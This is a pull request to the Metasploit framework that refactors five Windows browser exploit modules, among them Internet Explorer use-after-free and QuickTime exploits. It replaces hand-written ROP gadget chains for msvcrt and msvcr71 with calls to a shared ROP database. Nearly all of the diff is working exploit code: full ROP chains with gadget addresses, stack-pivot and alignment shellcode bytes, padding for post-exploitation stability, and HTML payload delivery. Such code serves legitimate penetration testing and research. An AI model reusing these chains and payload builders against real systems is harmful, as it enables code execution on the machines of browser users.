### PR TITLE
[SeeRM 8458] Use RopDb mixin for browser exploits

### DIFF
--- a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
@@ -11,6 +11,7 @@ class Metasploit4 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::RopDb
 
   def initialize(info={})
     super(update_info(info,
@@ -62,39 +63,9 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def get_payload(t)
-    p    = ''
-
-    rop =
-    [
-      0x77c1e844, # POP EBP # RETN [msvcrt.dll]
-      0x77c1e844, # skip 4 bytes [msvcrt.dll]
-      0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
-      0xffffffff,
-      0x77c127e5, # INC EBX # RETN [msvcrt.dll]
-      0x77c127e5, # INC EBX # RETN [msvcrt.dll]
-      0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
-      0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
-      0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
-      0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
-      0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
-      0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
-      0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
-      0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
-      0x77c3048a, # POP EDI # RETN [msvcrt.dll]
-      0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
-      0x77c46efb, # POP ESI # RETN [msvcrt.dll]
-      0x77c2aacc, # JMP [EAX] [msvcrt.dll]
-      0x77c3b860, # POP EAX # RETN [msvcrt.dll]
-      0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
-      0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
-      0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
-    ].pack("V*")
-
-    p << rop
-    p << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
-    p << payload.encoded
-
-    p
+    alignment = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+    p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})
+    return p
   end
 
 

--- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
@@ -135,100 +135,27 @@ class Metasploit3 < Msf::Exploit::Remote
     # No rop. Just return the payload.
     return code if t['Rop'].nil?
 
+    # Make post code execution more stable
+    code << rand_text_alpha(12000)
+
+    msvcrt_align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+    java_align   = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
+
+    rop_payload = ''
+
     case t['Rop']
     when :msvcrt
       case t.name
       when 'IE 8 on Windows XP SP3'
-        rop_gadgets =
-        [
-          0x77c1e844, # POP EBP # RETN [msvcrt.dll]
-          0x77c1e844, # skip 4 bytes [msvcrt.dll]
-          0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
-          0xffffffff,
-          0x77c127e5, # INC EBX # RETN [msvcrt.dll]
-          0x77c127e5, # INC EBX # RETN [msvcrt.dll]
-          0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
-          0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
-          0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
-          0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
-          0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
-          0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
-          0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
-          0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
-          0x77c3048a, # POP EDI # RETN [msvcrt.dll]
-          0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
-          0x77c46efb, # POP ESI # RETN [msvcrt.dll]
-          0x77c2aacc, # JMP [EAX] [msvcrt.dll]
-          0x77c3b860, # POP EAX # RETN [msvcrt.dll]
-          0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
-          0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
-          0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
-        ].pack("V*")
+        rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
       when 'IE 8 on Windows Server 2003'
-        rop_gadgets =
-        [
-          0x77bb2563, # POP EAX # RETN
-          0x77ba1114, # <- *&VirtualProtect()
-          0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
-          junk,
-          0x77bb0c86, # XCHG EAX,ESI # RETN
-          0x77bc9801, # POP EBP # RETN
-          0x77be2265, # ptr to 'push esp #  ret'
-          0x77bb2563, # POP EAX # RETN
-          0x03C0990F,
-          0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
-          0x77bb48d3, # POP EBX, RET
-          0x77bf21e0, # .data
-          0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
-          0x77bbfc02, # POP ECX # RETN
-          0x77bef001, # W pointer (lpOldProtect) (-> ecx)
-          0x77bd8c04, # POP EDI # RETN
-          0x77bd8c05, # ROP NOP (-> edi)
-          0x77bb2563, # POP EAX # RETN
-          0x03c0984f,
-          0x77bdd441, # SUB EAX, 03c0940f
-          0x77bb8285, # XCHG EAX,EDX # RETN
-          0x77bb2563, # POP EAX # RETN
-          nop,
-          0x77be6591  # PUSHAD # ADD AL,0EF # RETN
-        ].pack("V*")
+        rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
       end
     else
-      rop_gadgets =
-      [
-        0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
-        0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
-        0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
-        0x7c3415a2, # JMP [EAX] [msvcr71.dll]
-        0xffffffff,
-        0x7c376402, # skip 4 bytes [msvcr71.dll]
-        0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
-        0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
-        0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
-        0x7c344f87, # POP EDX # RETN [msvcr71.dll]
-        0xffffffc0, # Value to negate, will become 0x00000040
-        0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
-        0x7c34d201, # POP ECX # RETN [msvcr71.dll]
-        0x7c38b001, # &Writable location [msvcr71.dll]
-        0x7c347f97, # POP EAX # RETN [msvcr71.dll]
-        0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
-        0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
-        0x7c345c30  # ptr to 'push esp #  ret ' [msvcr71.dll]
-        # rop chain generated with mona.py
-      ].pack("V*")
+      rop_payload = generate_rop_payload('java', java_align + code)
     end
 
-    rop_payload = rop_gadgets
-    case t['Rop']
-    when :msvcrt
-      rop_payload << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
-    else
-      rop_payload << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
-    end
-    rop_payload << code
-    rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt
-
-    return rop_payload
+    rop_payload
   end
 
   def load_exploit_html(my_target, cli)

--- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -119,21 +119,21 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Extra junk in the end to make sure post code execution is stable.
     p = payload.encoded
-    p << rand_text_alpha(12000)
 
     case t['Rop']
     when :msvcrt
       align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
       rop_payload = ''
       if t.name == 'IE 8 on Windows XP SP3'
-        rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'})
+        rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
       elsif t.name == 'IE 8 on Windows Server 2003'
-        rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'2003'})
+        rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
       end
 
     else
       code  = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
       code << p
+      code << rand_text_alpha(12000)
 
       rop_payload = generate_rop_payload('java', code)
     end

--- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -117,77 +117,23 @@ class Metasploit3 < Msf::Exploit::Remote
   def get_payload(t, cli)
     rop_payload = ''
 
+    # Extra junk in the end to make sure post code execution is stable.
+    p = payload.encoded
+    p << rand_text_alpha(12000)
+
     case t['Rop']
     when :msvcrt
-      algin  = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
-      chain = ''
-
+      align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+      rop_payload = ''
       if t.name == 'IE 8 on Windows XP SP3'
-        chain =
-        [
-          0x77c1e844, # POP EBP # RETN [msvcrt.dll]
-          0x77c1e844, # skip 4 bytes [msvcrt.dll]
-          0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
-          0xffffffff,
-          0x77c127e5, # INC EBX # RETN [msvcrt.dll]
-          0x77c127e5, # INC EBX # RETN [msvcrt.dll]
-          0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
-          0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
-          0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
-          0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
-          0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
-          0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
-          0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
-          0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
-          0x77c3048a, # POP EDI # RETN [msvcrt.dll]
-          0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
-          0x77c46efb, # POP ESI # RETN [msvcrt.dll]
-          0x77c2aacc, # JMP [EAX] [msvcrt.dll]
-          0x77c3b860, # POP EAX # RETN [msvcrt.dll]
-          0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
-          0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
-          0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
-        ].pack("V*")
-
+        rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'})
       elsif t.name == 'IE 8 on Windows Server 2003'
-        junk = rand_text_alpha(4).unpack("V")[0].to_i
-        nop  = make_nops(4).unpack("V")[0].to_i
-
-        chain =
-        [
-          0x77bb2563, # POP EAX # RETN
-          0x77ba1114, # <- *&VirtualProtect()
-          0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
-          junk,
-          0x77bb0c86, # XCHG EAX,ESI # RETN
-          0x77bc9801, # POP EBP # RETN
-          0x77be2265, # ptr to 'push esp #  ret'
-          0x77bb2563, # POP EAX # RETN
-          0x03C0990F,
-          0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
-          0x77bb48d3, # POP EBX, RET
-          0x77bf21e0, # .data
-          0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
-          0x77bbfc02, # POP ECX # RETN
-          0x77bef001, # W pointer (lpOldProtect) (-> ecx)
-          0x77bd8c04, # POP EDI # RETN
-          0x77bd8c05, # ROP NOP (-> edi)
-          0x77bb2563, # POP EAX # RETN
-          0x03c0984f,
-          0x77bdd441, # SUB EAX, 03c0940f
-          0x77bb8285, # XCHG EAX,EDX # RETN
-          0x77bb2563, # POP EAX # RETN
-          nop,
-          0x77be6591  # PUSHAD # ADD AL,0EF # RETN
-        ].pack("V*")
+        rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'2003'})
       end
-
-      rop_payload = chain + algin + payload.encoded
 
     else
       code  = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
-      code << payload.encoded
-      code << rand_text_alpha(12000)
+      code << p
 
       rop_payload = generate_rop_payload('java', code)
     end

--- a/modules/exploits/windows/browser/ms13_055_canchor.rb
+++ b/modules/exploits/windows/browser/ms13_055_canchor.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::RopDb
 
   def initialize(info={})
     super(update_info(info,
@@ -109,85 +110,25 @@ class Metasploit3 < Msf::Exploit::Remote
     nil
   end
 
-  def get_payload(t, cli)
-    rop       = ''
-    code      = payload.encoded
-    esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
-
-    case t['Rop']
-    when :msvcrt
-      # Stack adjustment # add esp, -3500
-      esp_align = "\x81\xc4\x54\xf2\xff\xff"
-
+  def get_payload(t)
+    if t['Rop'] == :msvcrt
       print_status("Using msvcrt ROP")
-      rop =
-      [
-        0x77c1e844, # POP EBP # RETN [msvcrt.dll]
-        0x77c1e844, # skip 4 bytes [msvcrt.dll]
-        0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
-        0xffffffff,
-        0x77c127e5, # INC EBX # RETN [msvcrt.dll]
-        0x77c127e5, # INC EBX # RETN [msvcrt.dll]
-        0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
-        0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
-        0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
-        0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
-        0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
-        0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
-        0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
-        0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
-        0x77c3048a, # POP EDI # RETN [msvcrt.dll]
-        0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
-        0x77c46efb, # POP ESI # RETN [msvcrt.dll]
-        0x77c2aacc, # JMP [EAX] [msvcrt.dll]
-        0x77c3b860, # POP EAX # RETN [msvcrt.dll]
-        0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
-        0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
-        0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
-      ].pack("V*")
+      esp_align = "\x81\xc4\x54\xf2\xff\xff"
+      rop_dll = 'msvcrt'
+      opts    = {'target'=>'xp'}
     else
       print_status("Using JRE ROP")
-      rop =
-      [
-        0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
-        0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
-        0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
-        0x7c3415a2, # JMP [EAX] [msvcr71.dll]
-        0xffffffff,
-        0x7c376402, # skip 4 bytes [msvcr71.dll]
-        0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
-        0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
-        0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
-        0x7c344f87, # POP EDX # RETN [msvcr71.dll]
-        0xffffffc0, # Value to negate, will become 0x00000040
-        0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
-        0x7c34d201, # POP ECX # RETN [msvcr71.dll]
-        0x7c38b001, # &Writable location [msvcr71.dll]
-        0x7c347f97, # POP EAX # RETN [msvcr71.dll]
-        0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
-        0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
-        0x7c345c30  # ptr to 'push esp #  ret ' [msvcr71.dll]
-        # rop chain generated with mona.py
-      ].pack("V*")
+      esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
+      rop_dll = 'java'
+      opts    = {}
     end
 
-    rop_payload  = rop
-    rop_payload << esp_align
-    rop_payload << code
-    rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt
-
-    rop_payload
-  end
-
-  def junk
-    rand_text_alpha(4).unpack("V")[0].to_i
-  end
-
-  def nop
-    make_nops(4).unpack("V")[0].to_i
+    p = esp_align + payload.encoded + rand_text_alpha(12000)
+    generate_rop_payload(rop_dll, p, opts)
   end
 
   def get_html(t, p)
+    junk       = rand_text_alpha(4).unpack("V")[0].to_i
     js_pivot   = Rex::Text.to_unescape([t['Pivot']].pack("V*"))
     js_payload = Rex::Text.to_unescape(p)
     js_align   = Rex::Text.to_unescape([t['Align']].pack("V*"))
@@ -195,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     q_id = Rex::Text.rand_text_alpha(1)
 
-    html = %Q|
+    %Q|
 <!DOCTYPE html>
 <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
   <head>
@@ -244,8 +185,6 @@ class Metasploit3 < Msf::Exploit::Remote
   <t:ANIMATECOLOR id="myanim"/>
 </html>
     |
-
-    html
   end
 
   def on_request_uri(cli, request)
@@ -253,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
     t = get_target(agent)
 
     if t
-      p = get_payload(t, cli)
+      p = get_payload(t)
       html = get_html(t, p)
       print_status("Sending exploit...")
       send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})

--- a/modules/exploits/windows/browser/ms13_069_caret.rb
+++ b/modules/exploits/windows/browser/ms13_069_caret.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::RopDb
 
   def initialize(info={})
     super(update_info(info,
@@ -106,32 +107,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def get_payload(t)
-      rop =
-      [
-        0x77c1e844, # POP EBP # RETN [msvcrt.dll]
-        0x77c1e844, # skip 4 bytes [msvcrt.dll]
-        0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
-        0xffffffff,
-        0x77c127e5, # INC EBX # RETN [msvcrt.dll]
-        0x77c127e5, # INC EBX # RETN [msvcrt.dll]
-        0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
-        0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
-        0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
-        0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
-        0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
-        0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
-        0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
-        0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
-        0x77c3048a, # POP EDI # RETN [msvcrt.dll]
-        0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
-        0x77c46efb, # POP ESI # RETN [msvcrt.dll]
-        0x77c2aacc, # JMP [EAX] [msvcrt.dll]
-        0x77c3b860, # POP EAX # RETN [msvcrt.dll]
-        0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
-        0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
-        0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
-      ].pack("V*")
-
     # This data should appear at the beginning of the target address (see TargetAddr in metadata)
     p = ''
     p << rand_text_alpha(225)                     # Padding to avoid null byte addr
@@ -139,10 +114,9 @@ class Metasploit3 < Msf::Exploit::Remote
     p << [t['Align']].pack("V*") * ( (0x2c-4)/4 ) # 0x2c bytes to pivot (-4 for TargetAddr)
     p << [t['Pivot']].pack("V*")                  # Stack pivot
     p << rand_text_alpha(4)                       # Padding for the add esp,0x2c alignment
-    p << rop                                      # ROP chain
-    p << payload.encoded                          # Actual payload
+    p << generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
 
-    return p
+    p
   end
 
 


### PR DESCRIPTION
These browser exploits should be using ROP chains from RopDb. All the targets should be tested except for Windows Vista.
